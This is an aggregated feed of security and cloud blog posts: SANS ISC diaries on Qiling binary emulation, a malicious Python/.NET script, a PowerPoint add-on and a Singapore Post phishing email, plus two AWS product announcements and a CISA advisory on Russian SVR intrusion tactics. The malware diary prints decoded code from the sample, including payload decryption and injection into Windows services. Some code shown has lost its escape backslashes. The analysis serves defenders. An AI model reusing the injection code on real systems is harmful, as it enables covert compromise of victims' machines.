Qiling: A true instrumentable binary emulation framework, (Fri, Apr 30th)

This post was originally published on this site

A while ago, during the FLARE On 7 challenge last autumn, I had my first experience with the Qiling framework. It helped me to solve the challenge CrackInstaller by Paul Tarter (@Hefrpidge). If you want to read more about this (very interesting) challenge: https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/flareon7-challenge9-solution.pdf

Qiling is an advanced binary emulation framework, supporting many different platforms and architectures. It uses the well known Unicorn Engine and understands operating systems. It  knows how to load libraries and executables, how to relocate shared libraries, handles syscalls and IO handlers. Qiling can execute binaries without the binaries native operating system. You’ll probably won’t use Qiling to emulate complete applications, but emulating (large) functions and code works flawlessly. 

The Qiling framework comes out of the box supporting 40% of the Windows API calls, Linux syscalls and has also some UEFI coverage. Qiling is capable of creating snapshots, hooking into sys- and api calls, hot patching, remote debugging and hijacking stdin and stdout. Because Qiling is a framework, it is easy to extend and use by writing Python code.

Let me walk you through some of the features. Qiling can be started by a docker container, using the following command: 

docker run -p 5000:5000 -v (pwd):/work -it qilingframework/qiling

To start with Windows binaries, you need to collect the dlls (and registry) from a Windows system first. The batch file https://github.com/qilingframework/qiling/blob/master/examples/scripts/dllscollector.bat is available for this purpose, this will collect all the necessary files to get started.

After collecting the files, the following will make Qiling to load the library, configure the architecture and operating system and point to the root filesystem (containing the windows or linux libraries):

ql = Qiling(["/work/credhelper.dll"], archtype="x86", ostype="windows", rootfs="/work/10_break/rootfs/x8664_windows/", output="debug", console=True)

Now the framework is initialized, it is ready to execute specific address ranges. But first you’ll probably want to set-up, memory, stack and register values, which are being offered by the Unicorn Engine:

# set up memory pool
pool = ql.mem.map_anywhere(size)

# write memory at specific location
ql.mem.write(0x14000608c, ql.pack64(0x41424143414242))

# configure register values
ql.reg.rdx = param2
	
# setting up stack values
ql.stack_write(0x358, ql.reg.rsp+576) # local_358

Now we have set the memory, stack and registry, we can start the emulation:

ql.run(begin=start_offset, end=end_offset)

If you add the disassembly capabilities of Capstone, parts of the memory can be disassembled easily. The snippet below will hook every instruction and run the print_asm function.

from capstone import *
md = Cs(CS_ARCH_X86, CS_MODE_64)

def print_asm(ql, address, size):
    buf = ql.mem.read(address, size)
    for i in md.disasm(buf, address):
        print(":: 0x%x:t%st%s" %(i.address, i.mnemonic, i.op_str))

ql.hook_code(print_asm)

Dynamically hooking into the application, can be done using memory hooks, like intercepting memory errors and invalid reads:

def ql_x86_windows_hook_mem_error(ql, access, addr, size, value):
    ql.dprint(D_INFO, "[+] ERROR: unmapped memory access at 0x%x" % addr)
    return False

ql.hook_mem_unmapped(ql_x86_windows_hook_mem_error)

def hook_mem_read_invalid(ql, access, addr, size, value):
    ql.dprint(D_INFO, "[+] ERROR: invalid memory read at 0x%x" % addr)
    return True

ql.hook_mem_read_invalid(hook_mem_read_invalid)

def hook_mem_invalid(ql, access, addr, size, value):
    ql.dprint(D_INFO, "[+] ERROR: invalid memory access at 0x%x" % addr)
    return True

ql.hook_mem_invalid(hook_mem_invalid)

Often you want to intercept specific API calls, or maybe add calls that haven’t been implemented yet. The following code will implement the StringFromGUID2 api call, write the value to memory to the location lpsz parameter points to and return the size of the bytes written.

@winsdkapi(cc=STDCALL, dllname="ole32_dll", replace_params={
  "rguid": POINTER,
  "lpsz": POINTER,
  "cchMar": DWORD,
})
def hook_StringFromGUID2(ql, address, params):
        ql.nprint("StringFromGuid2", address, params)
        ql.mem.write(params.get('lpsz'), "test".encode('utf-16le') + 'x00'.encode('utf-16le'))
        return 5

ql.set_api("StringFromGUID2", hook_StringFromGUID2)

Hot patching code, is just writing to memory locations:

# patch kernel execute
ql.mem.write(0x140002b59, b'x90x90x90x90x90x90')

For this specific FlareOn challenge, I created a small Ghidra python plugin, to be able to visually select the address range to emulate. The Ghidra plugin communicates with a flask server, running my Qiling code to run the emulation and return results back to Ghidra. Using this approach it was easy to emulate small parts of the code and eventually leading to the solution of the challenge. 
 

There is much more Qiling, but for now have a great day!

References

Remco Verhoef (@remco_verhoef)
ISC Handler – Founder of DTACT
PGP Key
 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

From Python to .Net, (Thu, Apr 29th)

This post was originally published on this site

The Microsoft operating system provides the .Net framework[1] to developers. It allows to fully interact with the OS and write powerful applications… but also malicious ones. In a previous diary[2], I talked about a malicious Python script that interacted with the OS using the ctypes[3] library. Yesterday I found another Python script that interacts with the .Net framework to perform the low-level actions.

The script was called 'prophile.py'[4]  (SHA256:65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361) has a low VT score of 4/58. Let's have a look at it!

First, all interesting strings are obfuscated using a one-liner:

>>> URIAbQ=lambda s,k:''.join([chr((ord(c)^k)%0x100) for c in s])
>>> URIAbQ ('x8dx98x8ax92x95x90x8ax8dxd9xd6xbfxb0xd9xdbxaaxbcxabxafxb0xbaxbcxaaxd9x9cx88xd9', 249)
'tasklist /FI "SERVICES eq '

As the diary title says, the Python script uses the Python.Net library[5] to interact with the .Net framework:

Note: all the snippets of code have been decoded/beautified

from System.Security.Cryptography import*
from System.Reflection import*
import System

The script uses encrypted payloads but it was not possible to decrypt them because the script was found outside of its context. Indeed, it expects one command-line argument:

if __name__ == "__main__":
    if len(sys.argv) != 2:
        exit()

The expected parameter is the encryption key as we can see in this function call:

payload = DecryptPayloadToMemory(base64.b64decode(payload1[16:]), sys.argv[1], payload1[:16], log_file)

I did not found the parameter passed as an argument, no way to decrypt the payloads!

These payloads (stored in the script) are decrypted in memory:

def DecryptPayloadToMemory(payload, key, iv, log_file):
    instance = None
    try:
        rm = RijndaelManaged(KeySize=128, BlockSize=128)
        rm.Key = Str2Bytes(key)
        rm.IV = Str2Bytes(iv)
        rm.Padding = PaddingMode.PKCS7
        payload = Str2Bytes(payload)
        with System.IO.MemoryStream()as memory_handle:
            with CryptoStream(memory_handle,rm.CreateDecryptor(rm.Key, rm.IV), CryptoStreamMode.Write) as crypto_handle:
                crypto_handle.Write(payload, 0, payload.Length)
                print(crypto_handle.FlushFinalBlock())
                memory_handle.Position = 0
                instance = System.Array.CreateInstance(System.Byte, memory_handle.Length)
                memory_handle.Read(instance, 0, instance.Length)
    except System.SystemException as ex:
        log_file.write('[!] Net exc (msg: {0}, st: {1})'.format(ex.Message, ex.StackTrace))
        log_file.flush()
        instance = None
    return instance

The script injects malicious code into two Windows services:

process_name = "rpceptmapper"
process_name2 = "lanmanserver"

Two payloads are injected into these services using the Assembly.CreateInstance method[6]:

def InjectCode(enc_payld, process_name, log_file, asm):
    payload = DecryptPayloadToMemory(base64.b64decode(enc_payld[16:]), sys.argv[1], enc_payld[:16], log_file)
    if payload == None:
        log_file.write('[!] Failed to get payload')
        return False
    try:
        type = asm.GetType('DefaultSerializer.DefaultSerializer')
        pid = GetProcessPID(process_name)
        if pid != 0:
            NQHRxUDMlW = asm.CreateInstance(type.FullName,False,BindingFlags.ExactBinding,None,System.Array[System.Object]([payload,pid]),None,None)
            NQHRxUDMlE = type.GetMethod('Invoke')
            log_file.write(NQHRxUDMlE.Invoke(NQHRxUDMlW, None))
        else:
            log_file.write('[!] Failed to get pid')
            return True
    except System.SystemException as ex:
        log_file.write('[!] Net exc (msg: {0}, st: {1})'.format(ex.Message,ex.StackTrace))
        return False
    return True

Another example of how Python becomes more and more popular for attackers!

[1] https://dotnet.microsoft.com/download/dotnet-framework
[2] https://isc.sans.edu/forums/diary/Python+and+Risky+Windows+API+Calls/26530
[3] https://docs.python.org/3/library/ctypes.html
[4] https://bazaar.abuse.ch/sample/65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361/
[5] http://pythonnet.github.io
[6] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.createinstance?view=net-5.0

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Amazon Nimble Studio – Build a Creative Studio in the Cloud

This post was originally published on this site

Amazon Nimble Studio is a new service that creative studios can use to produce visual effects, animations, and interactive content entirely in the cloud with AWS, from the storyboard sketch to the final deliverable. Nimble Studio provides customers with on-demand access to virtual workstations, elastic file storage, and render farm capacity. It also provides built-in automation tools for IP security, permissions, and collaboration.

Traditional creative studios often face the challenge of attracting and onboarding talent. Talent is not localized, and it’s important to speed up the hiring of remote artists and make them as productive as if they were in the same physical space. It’s also important to allow distributed teams to use the same workflow, software, licenses, and tools that they use today, while keeping all assets secure.

In addition, traditional customers resort to buying more hardware for their local render farms, rent hardware at a premium, or extend their capacity with cloud resources. Those who decide to render on the cloud navigate these options and the large breadth of AWS offerings and perceive complexity, which can lead them to choose legacy approaches.

Screenshot of maya lighting

Today, we are happy to announce the launch of Amazon Nimble Studio, a service that addresses these concerns by providing ready-made IT infrastructure as a service, including workstations, storage, and rendering.

Nimble Studio is part of a broader portfolio of purpose-built AWS capabilities for media and entertainment use cases, including AWS services, AWS and Partner Solutions, and over 400 AWS Partners. You can learn more about our AWS for Media & Entertainment initiative, also launched today, which helps media and entertainment customers easily identify industry-specific AWS capabilities across five key business areas: Content production, Direct-to-consumer and over-the-top (OTT) streaming, Broadcast, Media supply chain and archive, and Data science and Analytics.

Benefits of using Nimble Studio
Nimble Studio is built on top of AWS infrastructure, ensuring performant computing power and security of your data. It also enables an elastic production, allowing studios to scale the artists’ workstations, storage, and rendering needs based on demand.

When using Nimble Studio, artists can use their favorite creative software tools on an Amazon Elastic Compute Cloud (EC2) virtual workstation. Nimble Studio uses EC2 for compute, Amazon FSx for storage, AWS Single Sign-On for user management, and AWS Thinkbox Deadline for render farm management.

Nimble Studio is open and compatible with most storage solutions that support the NFS/SMB protocol, such as Weka.io and Qumulo, so you can bring your own storage.

For high-performance remote display, the service uses the NICE DCV protocol and provisions G4dn instances that are available with NVIDIA GPUs.

By providing the ability to share assets using globally accessible data storage, Nimble Studio makes it possible for studios to onboard global talent. And Nimble Studio centrally manages licenses for many software packages, reduces the friction of onboarding new artists, and enables predictable budgeting.

In addition, Nimble Studio comes with an artist-friendly console. Artists don’t need to have an AWS account or use the AWS Management Console to do their work.

But my favorite thing about Nimble Studio is that it’s intuitive to set up and use. In this post, I will show you how to create a cloud-based studio.

screenshot of the intro of nimble studio

 

Set up a cloud studio using Nimble Studio
To get started with Nimble Studio, go to the AWS Management Console and create your cloud studio. You can decide if you want to bring your existing resources, such as file storage, render farm, software license service, Amazon Machine Image (AMI), or a directory in Active Directory. Studios that migrate existing projects can use AWS Snowball for fast and secure physical data migration.

Configure AWS SSO
For this configuration, choose the option where you don’t have any existing resources, so you can see how easy it is to get started. The first step is to configure AWS SSO in your account. You will use AWS SSO to assign the artists permissions based on some roles to access the studio. To set up AWS SSO, follow these steps in the AWS Directory Services console.

Configure your studio with StudioBuilder
StudioBuilder is a tool that will help you to deploy your studio simply by answering some configuration questions. StudioBuilder is available in an AMI. You can get it for free from the AWS Marketplace.

After you get the AMI from AWS Marketplace, you can find it in your Private images list in the EC2 console. Launch that AMI in an EC2 instance. I recommend a t3.medium instance. Set the Auto-assign Public IP field to Enable to ensure that your instance receives a public IP address. You will use it later to connect to the instance.

Screenshot of launching the StudioBuilder AMI

As soon as you connect to the instance, you are directed to the StudioBuilder setup.

Screenshot of studio builder setup

The setup guides you, step by step through the configuration of networking, storage, Active Directory, and rendering farm. Simply answer the questions to build the right studio for your needs.

Screenshot of the studio building

The setup takes around 90 minutes. You can monitor the progress using the AWS CloudFormation console. Your studio is ready when four new CloudFormation stacks have been created in your account: Network, Data, Service, and Compute.

Screenshot of stacks completed in CloudFormation

Now terminate the StudioBuilder instance and return to the Nimble Studio console. In Studio setup, you can see that you’ve completed four of the five steps.

Screenshot of the studio setup tutorial

Assign access to studio admin and users
To complete the last step, Step 5: Allow studio access, you will use the Active Directory directory you created during the StudioBuilder step and the AWS SSO you configured earlier to allow access to the administrators and artists to the studio.

Follow the instructions in the Nimble Studio console to connect the directory to AWS SSO. Then you can add administrators to your studio. Administrators have control over what users can do in the studio.

At this point, you can add users to the studio, but because your directory doesn’t have users yet, move to the next step. You can return to this step later to add users to the studio.

Accessing the studio for the first time
When you open the studio for the first time, you will find the Studio URL in the Studio Manager console. You will share this URL with your artists when the studio is ready. To sign in to the studio, you need the user name and password of the Admin you created earlier.

Screenshot of studio name

Launch profiles
When the studio opens, you will see two launch profiles: one that is a render farm instance and the other that is a workstation. They were created by StudioBuilder when you set up the studio. Launch profiles control access to resources in your studio, such as compute farms, shared file systems, instance types, and AMIs. You can use the Nimble Studio console to create as many launch profiles as you need, to customize your team’s access to the studio resources.

Screenshot of the studio

When you launch a profile, you launch a workstation that includes all the software you provided in the installed AMI. It takes a few minutes for the instance to launch for the first time. When it is ready, you will see the instance in the browser. You can sign in to it with the same user name and password you use to sign in to the studio.

Screenshot of launching a new instance

Now your studio is ready! Before you share it with your artists, you might want to configure more launch profiles, add your artist users to the directory, and give those users permissions to access the studio and launch profiles.

Here’s a short video that describes how Nimble Studio can help you and works:

Available now
Nimble Studio is now available in the US West (Oregon), US East (N. Virginia), Canada (Central), Europe (London), Asia Pacific (Sydney) Regions and the US West (Los Angeles) Local Zone.

Learn more about Amazon Nimble Studio and get started building your studio in the cloud.

Marcia

Deeper Analyzis of my Last Malicious PowerPoint Add-On, (Wed, Apr 28th)

This post was originally published on this site

Last week, I wrote a diary about a malicious PowerPoint add-on[1] and I concluded by saying that I was not able to continue the investigation because the URL found in the macro pointed to a blogspot.com URL. Ron, one of our readers, found that this page was indeed malicious and contained some piece of JavaScript executed by mshta.exe.

The document discovered by Ron was not identical to mine (the macro slightly changed) but it pointed to the same URL (the blog has been closed by Blogger in the meantime).

How did I miss this simple piece of JavaScript? I don't know but thanks to Ron for sharing the nice document[2]. Very interesting read!

[1] https://isc.sans.edu/forums/diary/Malicious+PowerPoint+AddOn+Small+Is+Beautiful/27342/
[2] http://isc.h2392901.stratoserver.net/Xavier_1.pdf

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Get Started Using Amazon FSx File Gateway for Fast, Cached Access to File Server Data in the Cloud

This post was originally published on this site

As traditional workloads continue to migrate to the cloud, some customers have been unable to take advantage of cloud-native services to host data typically held on their on-premises file servers. For example, data commonly used for team and project file sharing, or with content management systems, has needed to reside on-premises due to issues of high latency, or constrained or shared bandwidth, between customer premises and the cloud.

Today, I’m pleased to announce Amazon FSx File Gateway, a new type of AWS Storage Gateway that helps you access data stored in the cloud with Amazon FSx for Windows File Server, instead of continuing to use and manage on-premises file servers. Amazon FSx File Gateway uses network optimization and caching so it appears to your users and applications as if the shared data were still on-premises. By moving and consolidating your file server data into Amazon FSx for Windows File Server, you can take advantage of the scale and economics of cloud storage, and divest yourself of the undifferentiated maintenance involved in managing on-premises file servers, while Amazon FSx File Gateway solves issues around latency and bandwidth.

Replacing On-premises File Servers
Amazon FSx File Gateway is an ideal solution to consider when replacing your on-premises file servers. Low-latency access ensures you can continue to use latency-sensitive on-premises applications, and caching conserves shared bandwidth between your premises and the cloud, which is especially important when you have many users all attempting to access file share data directly.

You can attach an Amazon FSx file system and present it through a gateway to your applications and users provided they are all members of the same Active Directory domain, and the AD infrastructure can be hosted in AWS Directory Service, or managed on-premises.

Your data, as mentioned, resides in Amazon FSx for Windows File Server, a fully managed, highly reliable and resilient file system, eliminating the complexity involved in setting up and operating file servers, storage volumes, and backups. Amazon FSx for Windows File Server provides a fully native Windows file system in the cloud, with full Server Message Block (SMB) protocol support, and is accessible from Windows, Linux, and macOS systems running in the cloud or on-premises. Built on Windows Server, Amazon FSx for Windows File Server also exposes a rich set of administrative features including file restoration, data deduplication, Active Directory integration, and access control via Access Control Lists (ACLs).

Choosing the Right Gateway
You may be aware of Amazon S3 File Gateway (originally named File Gateway), and might now be wondering which type of workload is best suited for the two gateways:

  • With Amazon S3 File Gateway, you can access data stored in Amazon Simple Storage Service (S3) as files, and it’s also a solution for file ingestion into S3 for use in running object-based workloads and analytics, and for processing data that exists in on-premises files.
  • Amazon FSx File Gateway, on the other hand, is a solution for moving network-attached storage (NAS) into the cloud while continuing to have low-latency, seamless access for your on-premises users. This includes two general-purpose NAS use-cases that use the SMB file protocol: end-user home directories and departmental or group file shares. Amazon FSx File Gateway supports multiple users sharing files, with advanced data management features such as access controls, snapshots for data protection, integrated backup, and more.

One additional unique feature I want to note is Amazon FSx File Gateway integration with backups. This includes backups taken directly within Amazon FSx and those coordinated by AWS Backup. Prior to a backup starting, Amazon FSx for Windows File Server communicates with each attached gateway to ensure any uncommitted data gets flushed. This helps further reduce your administrative overhead and worries when moving on-premises file shares into the cloud.

Working with Amazon FSx File Gateway
Amazon FSx File Gateway is available using multiple platform options. You can order and deploy a hardware appliance into your on-premises environment, deploy as a virtual machine into your on-premises environment (VMware ESXi, Microsoft Hyper-V, Linux KVM), or deploy in cloud as an Amazon Elastic Compute Cloud (EC2) instance. The available options are displayed as you start to create a gateway from the AWS Storage Gateway Management Console, together with setup instructions for each option.

Below, I choose to use an EC2 instance for my gateway.

FSx File Gateway platform options

The process of setting up a gateway is pretty straightforward and as the documentation here goes into detail, I’m not going to repeat the flow in this post. Essentially, the steps involved are to first create a gateway, then join it to your domain. Next, you attach an Amazon FSx file system. After that, your remote clients can work with the data on the file system, but the important difference is that they connect using a network share to the gateway instead of to the Amazon FSx file system.

Below is the general configuration for my gateway, created in US East (N. Virginia).

FSx File Gateway Details

And here are the details of my Amazon FSx file system, running in an Amazon Virtual Private Cloud (VPC) in US East (N. Virginia), that will be attached to my gateway.

FSx File System Details

Note that I have created and activated the gateway in the same region as the source Amazon FSx file system, and will manage the gateway from US East (N. Virginia). The gateway virtual machine (VM) is deployed as an EC2 instance running in a VPC in our remote region, US West (Oregon). I’ve also established a peering connection between the two VPCs.

Once I have attached the Amazon FSx file system to my Amazon FSx File Gateway, in the AWS Storage Gateway Management Console I select FSx file systems and then the respective file system instance. This gives me the details of the command needed by my remote users to connect to the gateway.

Viewing the attached Amazon FSx File System

Exploring an End-user Scenario with Amazon FSx File Gateway
Let’s explore a scenario that may be familiar to many readers, that of a “head office” that has moved its NAS into the cloud, with one or more “branch offices” in remote locations that need to connect to those shares and the files they hold. In this case, my head office/branch office scenario is for a fictional photo agency, and is set up so I can explore the gateway’s cache refresh functionality. For this, I’m imagining a scenario where a remote user deletes some files accidentally, and then needs to contact an admin in the head office to have them restored. This is possibly a fairly common scenario, and one I know I’ve had to both request, and handle, in my career!

My head office for my fictional agency is located in US East (N. Virginia) and the local admin for that office (me) has a network share attached to the Amazon FSx file system instance. My branch office, where my agency photographers work, is located in the US West (Oregon) region, and users there connect to my agency’s network over a VPN (an AWS Direct Connect setup could also be used). In this scenario, I simulate the workstations at each office using Amazon Elastic Compute Cloud (EC2) instances.

In my fictional agency, photographers upload images to my agency’s Amazon FSx file system, connected via a network share to the the gateway. Even though my fictional head office, and the Amazon FSx file system itself are resources located on the east coast, the gateway and its cache provide a fast, low latency connection for users in the remote branch office, making it seem as though there is a local NAS. After photographers upload images from their assignments, additional staff in the head office do some basic work on them, and make the partly-processed images available back to the photographers on the west coast via the file share.

The image below illustrates the resource setup for my fictional agency.

My sample head/branch office setup, as AWS resources

I have set up scheduled multiple daily backups for the file system, as you might expect, but I’ve also gone a step further and enabled shadow copies on my Amazon FSx file system. Remember, Amazon FSx for Windows File Server is a Windows File Server instance, it just happens to be running in the cloud. You can find details of how to set up shadow copies (which are not enabled by default) in the documentation here. For the purposes of the fictional scenario in this blog post, I set up a schedule so that my shadow copies are taken every hour.

Back to my fictional agency. One of my photographers on the west coast, Alice, is logged in and working with a set of images that have already had some work done on them by the head office. In this image, it’s apparent Alice is connected and working on her images via the network share IP marked in an earlier image in this post – this is the gateway file share.

Suddenly, disaster strikes and Alice accidentally deletes all of the files in the folder she was working in. Picking up the phone, she calls the admin (me) in the east coast head office and explains the situation, wondering if we can get the files back.

Since I’d set up scheduled daily backups of the file system, I could probably restore the deleted files from there. This would involve a restore to a new file system, then copying the files from that new file system to the existing one (and deleting the new file system instance afterwards). But, having enabled shadow copies, in this case I can restore the deleted files without resorting to the backups. And, because I enabled automated cache refreshes on my gateway, with the refresh period set to every 5 minutes, Alice will see the restored files relatively quickly.

My admin machine (in the east coast office) has a network share to the Amazon FSx file system, so I open an explorer view onto the share, right-click the folder in question, and select Restore previous versions. This gives me a dialog where I can select the most recent shadow copy.

Restoring the file data from shadow copies

I ask Alice to wait 5 minutes, then refresh her explorer view. The changes in the Amazon FSx file system are propagated to the cache on the gateway and sure enough, she sees the files she accidentally deleted and can resume work. (When I saw this happen for real in my test setup, even though I was expecting it, I let out a whoop of delight!). Overall, I hope you can see how easy it is to set up and operate an Amazon FSx File Gateway with an Amazon FSx for Windows File Server.

Get Started Today with Amazon FSx File Gateway
Amazon FSx File Gateway provides a low-latency, efficient connection for remote users when moving on-premises Windows file systems into the cloud. This benefits users who experience higher latencies, and shared or limited bandwidth, between their premises and the cloud. Amazon FSx File Gateway is available today in all commercial AWS regions where Amazon FSx for Windows File Server is available. It’s also available in the AWS GovCloud (US-West) and AWS GovCloud (US-East) regions, and the Amazon China (Beijing), and China (Ningxia) regions.

You can learn more on this feature page, and get started right away using the feature documentation.

Diving into a Singapore Post Phishing E-mail, (Tue, Apr 27th)

This post was originally published on this site

With the sustained persistence of COVID-19 globally, postal and e-commerce related phishing e-mails remain as one of the most widely favoured methods by adversaries and cybercrime groups. Although postal and shipping companies have often put-up warnings with respect to phishing sites and e-mails (for example Singapore Post [1] and DHL [2]), phishing sites and e-mails continue to be propagated. While organizations continue to deploy technologies and invest in security awareness training to allow better detection of phishing e-mails, individuals who are not particularly IT-savvy could fall prey to such phishing e-mails, especially with respect to their personal e-mail accounts who may not have enterprise phishing protection features. I was recently forwarded one phishing e-mail for a quick look. Unfortunately, by the time I got to it, the phishing page appeared to have been taken down. However, there were some salient points that struck me when I analyzed the contents of the e-mail, and wanted to talk a bit about it so as to increase awareness.

A check on the e-mail headers yielded the following information (with reference to Figure 1, and some details were omitted to preserve privacy):

Figure 1: E-Mail Headers

I did some research on the e-mail address in the “From” and “Sender” fields, and discovered that it originated from a legitimate company (hence the redaction). Of course, the name reflected in the “From” and “Sender” fields should have triggered some red flags since it stated “Singapore-post” but displayed another e-mail address.

Moving on to the contents of the e-mail. With reference to Figure 2 below, we can see the contents (some information have been removed to preserve privacy).

Figure 2: Contents of Phishing E-Mail

The first thing that drew my attention was the logo that was retrieved from a third-party site which felt particularly dodgy. After visiting the “phishing” site, a webpage related to the original site loaded with no signs of any content related to Singapore Post (thankfully!). While it appeared that the owner of the website removed phishing content and replaced with something of their own, the link was still kept.

Looking at all the factors, there were many opportunities to deny the adversaries from succeeding in sending out the phishing e-mail. The factors that could be addressed are as follows:

1. Image Hotlinking: This is a common issue faced by many individuals and organizations hosting their websites. If left unchecked, it could affect the uptime and bandwidth costs (this is especially so for small businesses that often cannot afford high-capacity web hosting plans). In this case, we can see that the third-party website inadvertently facilitated the adversaries’ attempts in providing the logo for their phishing e-mails. To mitigate this issue, one can consider using Content Delivery Networks (CDN) that have hotlink protection features, or tweak cPanel settings (if it is used to administer your website) as shown here [3]. There are also a few other methods, but configuration will vary due to the type of CMS that the website is running on. Nevertheless, there are some robust documentations available online with respect to image hotlinking, and owners should consider implementing them if possible.

2. Securing assets: A legitimate organization’s e-mail system was compromised to send out the phishing e-mail, and another legitimate organization’s website was used to host the phishing page. I did not probe into the affected organizations’ assets, but such compromises are usually due to unpatched systems, security misconfiguration or a successful phish of administrative credentials. Unfortunately, other than taking a proactive approach towards cybersecurity within limits of a given budget, there isn’t really much an organization can do (ignoring the issue can be one way, but that is bound to bring more disastrous and pressing issues to the organization/business in future). Building and maintaining security controls can be challenging, but there is useful documentation such as the CIS Controls (version 8 launching soon [4]) that organizations could refer to bolster their cybersecurity readiness.

As always, when in doubt, verify the authenticity of the e-mail received. In addition, why not consider checking in with your loved ones and friends to see if they received any phishing e-mails and let them know how they could spot potential ones? These are no doubt challenging times, and being able to maintain access to your digital accounts should be one of the top priorities.

References:

[1] https://www.singpost.com/online-security-you

[2] https://www.dhl.com/sg-en/home/footer/fraud-awareness.html

[3] https://documentation.cpanel.net/display/84Docs/Hotlink+Protection

[4] https://www.sans.org/blog/cis-controls-v8/

———–
Yee Ching Tok, ISC Handler
Personal Site
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

CAD: .DGN and .MVBA Files, (Mon, Apr 26th)

This post was originally published on this site

Regularly I receive questions about MicroStation files, since I wrote a diary entry about AutoCAD drawings containing VBA code.

MicroStation is CAD software, and it can run VBA code.

I've never been given malicious MicroStation files, but recently I've been given a normal drawing (.dgn) and a script file (.mvba).

To be clear: these are not malware samples, the files were given to me so that I could take a look at the internal file format and report it.

Turns out that both files are "OLE files", and can thus be analyzed with my oledump.py tool.

Here is the .DGN file:

It's an OLE file with storage (folder) Dgn-Md containing other storages and streams.

And the metadata identifies this as a MicroStation file (I'm using tail to filter out the thumbnail data):

It does not contain VBA code: AFAIK, .DGN files can not contain VBA code. Please post a comment if I'm wrong, or if you can share a sample .DGN file containing VBA code.

The VBA script file, with extension .MVBA, is also an OLE file with VBA code streams:

Here too, the M indicator alerts us to the presence of VBA code. It can be extracted with oledump:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders

This post was originally published on this site

Original release date: April 26, 2021

Summary

The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.

The FBI and DHS are providing information on the SVR’s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.

Click here for a PDF version of this report.

Threat Overview

SVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors’ ability to move within victim environments undetected.

Beginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.

Technical Details

SVR Cyber Operations Tactics, Techniques, and Procedures

Password Spraying

In one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a “low and slow” manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.

The organization unintentionally exempted the compromised administrator’s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.

The actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.

While the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.

During the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. 

Recommendations

To defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including:

  • Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.
  • Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.
  • Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.
  • Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.
  • Regularly review the organization’s password management program.
  • Ensure the organization’s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.
  • Maintain a regular cadence of security awareness training for all company employees.

Leveraging Zero-Day Vulnerability

In a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.

The actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.

